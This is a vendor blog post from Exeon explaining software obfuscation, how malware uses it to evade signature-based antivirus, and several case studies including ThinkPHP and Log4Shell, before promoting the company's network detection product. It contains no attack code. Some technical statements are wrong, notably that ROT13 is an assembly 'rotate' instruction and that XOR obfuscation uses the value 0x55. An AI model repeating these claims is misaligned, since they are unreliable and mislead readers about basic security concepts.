Obfuscation: Good to Protect, Hard to Detect

Obfuscation explained by Harald Beutlhauser on the Exeon blog.webp

What is Obfuscation?

Obfuscation is an important technique for protecting software, but it also carries risks, especially when used by malware authors. We took a closer look:

Obfuscation refers to the technique of deliberately making information difficult to understand, especially in the realm of computer code. An important area of obfuscation is data obfuscation, where sensitive data is obscured to protect it from unauthorized access. Different methods are used. For example, some data can be replaced with placeholders—only the last four digits of a credit card number are often displayed, while the others are replaced with Xs or asterisks, for instance. Encryption, on the other hand, converts data into an unreadable form that can only be decrypted with a special key.

Obfuscation of computer code uses complex language and redundant logic to make the code difficult to understand. The goal is to fool both human readers and programs such as decompilers. This is done by encrypting parts of the code, removing metadata, or replacing meaningful names with meaningless ones.

Inserting unused or meaningless code is also a common practice to disguise the actual code. A tool known as an obfuscator can automate these processes and modify the source code so that it still works but is harder to understand.

Other methods of obfuscation include compressing the entire program, making the code unreadable, and altering the control flow to create unstructured, difficult-to-maintain logic. Inserting dummy code that does not affect the program's logic or result is also common. Several techniques are often combined to create a layered effect and increase security.

Endpoint Detection and Response (EDR) systems often work with obfuscated code in order to be less vulnerable. On the other hand, ExeonTrace, as an AI-based Network Detection and Response (NDR), is completely invisible in the network and does not send any network traffic itself, so hackers can hardly recognize or manipulate the solution and the solution does not have to obfuscate.

There are Two Sides to Everything

Unfortunately, obfuscation is a double-edged sword—it provides protection but also presents challenges, as it is used not only by legitimate software developers but also by malicious software authors.

A well-known example is the 2020 SolarWinds attack, in which hackers used obfuscation to evade defenses and hide their attacks.

The goal of obfuscation is to anonymize cyber attackers, reduce the risk of detection, and hide malware by changing the overall signature and fingerprint of the malicious code even if the payload is a known threat.

The signature is a hash, a unique alphanumeric representation of a malware item. Signatures are very often hashed, but they can also be another short representation of a unique code within a malware element.

(Image source: CNBC)

Rather than attempting to create a new signature by modifying the malware itself, obfuscation focuses on delivery mechanisms to fool antivirus solutions that rely on signatures (compare this to the use of machine learning, predictive analytics, and AI to bolster defenses).

Like good obfuscation, bad obfuscation can combine a variety of techniques to hide malware, creating multiple layers of obfuscation. These techniques include packers, which are software packages that compress malware programs to hide their presence and make the original code unreadable. Crypters can encrypt malware programs or parts of software to restrict access to code that could alert an antivirus product through known signatures. Another technique is dead code insertion, where ineffective, useless code is added to malware to disguise the appearance of a program. Attackers can also use instruction modification, where the instruction codes in malware programs are changed from the original patterns, which changes the appearance of the code but not its behavior and changes the order and sequence of the scripts. Exclusive-OR (XOR) is a common obfuscation method that hides data so that it can only be read by those who apply XOR values of 0x55 to the code. Finally, ROT13 is an ASM instruction for "rotate" that replaces random letters with code.

However, obfuscating the code is only the first step: no matter how much work the hacker puts into obfuscating the code to bypass EDR, the malware must communicate within the network and to the outside world in order to be “successful”. This means that communication must also be obfuscated. In contrast to the past, when networks were scanned as quickly as possible and attempts were immediately made to extract data in the largest possible terabyte range at once, attackers today communicate more quietly so that the sensors and switches for the monitoring tools do not strike. The goal of obtaining IP addresses via scanning, for example, is pursued slowly in order to remain under the radar. Reconnaissance, in which the threat actors try to gather initial vulnerabilities about their targeted victims, e.g. their network architecture, is also becoming slower and less transparent.

All about obfuscation - Exeon cybersecurity blog 2.webp

Case Studies: Obfuscated Attacks

PowerShell

In an "interesting" example of obfuscation, a Microsoft Windows tool called PowerShell is being abused by attackers. Malware abusing PowerShell obfuscates its activities through techniques like string encoding, command obfuscation, dynamic code execution, environment awareness, polyglot scripting, and fileless operation. These methods hide the true intent and structure of the malware, making it difficult for security systems to detect and analyze it.

XLS.HTML

In a recent cyber-attack, a group of hackers used elaborated obfuscation techniques to hide their malicious activities. They targeted a phishing campaign called XLS.HTML, changing their encryption methods at least 10 times over a year to avoid detection. Their tactics included using plain text, escape encoding, Base64 encoding, and even Morse code. This constantly changing approach shows that attackers know they need to keep varying their methods to outsmart security measures.

ThinkPHP

ThinkPH is an open source web application framework commonly used to develop PHP-based web applications. Attackers exploited ThinkPHP vulnerabilities CVE-2018-20062 and CVE-2019-9082 to execute remote code on servers. They bypassed typical automated tools by installing an obfuscated web shell called "Dama" from a remote server, allowing permanent access and further attacks. This advanced obfuscation demonstrates a sophisticated approach to cyber-attacks.

Why You Should Not Trust Signatures (Only)

Signature-based detection is effective for known threats, but it cannot detect zero-day vulnerabilities and neither obfuscated attacks. This is why:

  • Variability of obfuscation: Malware authors use different techniques to obfuscate their malware. This can make it difficult to create reliable signatures. Even small changes in the code can cause the signature to fail.
  • Polymorphic malware: Polymorphic malware constantly changes its structure to avoid detection. Each time it is executed, the code looks different, making it impossible to create static signatures.
  • Metamorphic malware: Metamorphic malware adapts during execution and dynamically changes its code. This makes it even more difficult to create static signatures.
  • Zero-day exploits: Signature-based solutions rely on known threats. They fail with zero-day exploits that are new and unknown.
  • False positives: If a signature-based solution returns too many false positives, it can be inefficient. False positives can be a drain on security team resources.

How to protect and defend against obfuscation and cyber threats.webp

There Might be an Answer…

Anomaly-based IDS solutions, on the other hand, build a model of normal system behavior and detect unusual activity.

NDR tools like ExeonTrace continuously adapt to stay ahead of the ever-evolving cyber threat landscape. They play a critical role in detecting malware and command and control (C&C) channels even the one’s using obfuscation techniques. Here's how they do it:

Behavioral analysis:

ExeonTrace monitors the behavior of network traffic. It identifies unusual patterns that may indicate C&C communications, such as outer-periodic data transmissions. It examines HTTP requests, DNS traffic, and other logs to detect irregular or suspicious behavior or communication potentially associated with (obfuscated) malicious behavior.

Anomaly detection at metadata level and AI analysis:

ExeonTrace analyzes metadata to identify unusual patterns that show suspicious activity. Machine learning models, are able to learn to recognize typical obfuscation techniques visible through suspicious behavior in network traffic, e.g. the execution of atypical communication, that could be associated with obfuscated code.

Since malware needs to communicate both within the network and to the outside world to be successful, it will also do so in masked form. Attackers today operate more quietly and slowly to remain undetected: ExeonTrace therefore works with long-term communication monitoring and, in addition to its ability to perform batch runs within minutes, also looks at longer periods of time, e.g. 3 days, in order to have comparative values, learn regularities and recognize irregularities from them.

Real-time alerts would lead to a large number of alerts here, if, for example, a ping scan is detected every minute, which alerts, but which does not necessarily have to be anything malicious.

ExeonTrace exchanges threat data with other security solutions, enabling faster detection of known obfuscation techniques and suspicious behavior.

Through integration with EDR solutions, ExeonTrace correlates suspicious activity detected on endpoints with network traffic. This comprehensive approach significantly improves security analysis.

Case Solved:

The Log4j vulnerability, also known as CVE-2021-44228 or Log4Shell, lets attackers remotely take control of vulnerable systems. This happens because the Log4j library does not properly handle certain inputs. Attackers can send a specially crafted request to trigger this flaw, allowing them to run malicious code on the target system. This vulnerability has been widely exploited, with attackers installing Trojan malware and crypto-miners on affected systems. To avoid detection, the malware hides its functions and file names with obfuscation.

ExeonTrace uses metadata to analyze network traffic, leveraging AI insights along with Mitre and Zeek Threat Intelligence. This enables us to quickly create effective queries to examine all available network data. We can see all connections made during an attack and check for signs of successful intrusions. We also look for common communication methods like LDAP, LDAPS, and RMI, often used with Log4j, and search for other indicators of control communication by examining specific Java classes known to be used in such attacks. When investigating the Log4j vulnerability, we can quickly identify signs of attempted attacks on servers connected to the internet and uncover malicious activities.

Interested in seeing how ExeonTrace works in your system and organization? Watch this recorded demo of an advanced threat for more!

Harald Beutlhauser

Author:

Harald Beutlhauser

Senior Presales Engineer

email:

harald.beutlhauser@exeon.com

Share:

Published on:

22.07.2024